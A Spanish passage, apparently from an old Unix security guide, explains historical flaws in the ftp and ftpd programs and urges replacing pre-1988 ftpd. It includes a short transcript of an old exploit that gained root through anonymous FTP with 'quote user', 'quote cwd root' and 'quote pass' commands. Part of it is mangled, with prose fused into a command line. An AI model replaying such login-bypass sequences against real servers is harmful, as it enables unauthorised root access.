El protocolo de transferencia de ficheros(FTP), se implementa mediante los programas ftp y ftpd[Sun88]. Las viejas versiones de los mismos presentaban ciertos fallos de seguridad. Para el ftpd, si se dispone de una versión de antes de diciembre de 1988, es preciso cambiarla. Una de las posibilidades que ofrece este servicio es el FTP anónimo, para la distribución de software público. Existía por ejemplo un antiguo bug del ftp mediante el cual conseguíamos accesos de root[FV86]:
% ftp -nsi esto funciona habremos entrado como root en el sistema.
ftp> open ribera.tel.uva.es
Connected to ribera.tel.uva.es
220 ribera.tel.uva.es FTP server ready
ftp> quote user ftp
331 guest login ok, send ident as password.
ftp> quote cwdroot
530 Please login with USER and PASS
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.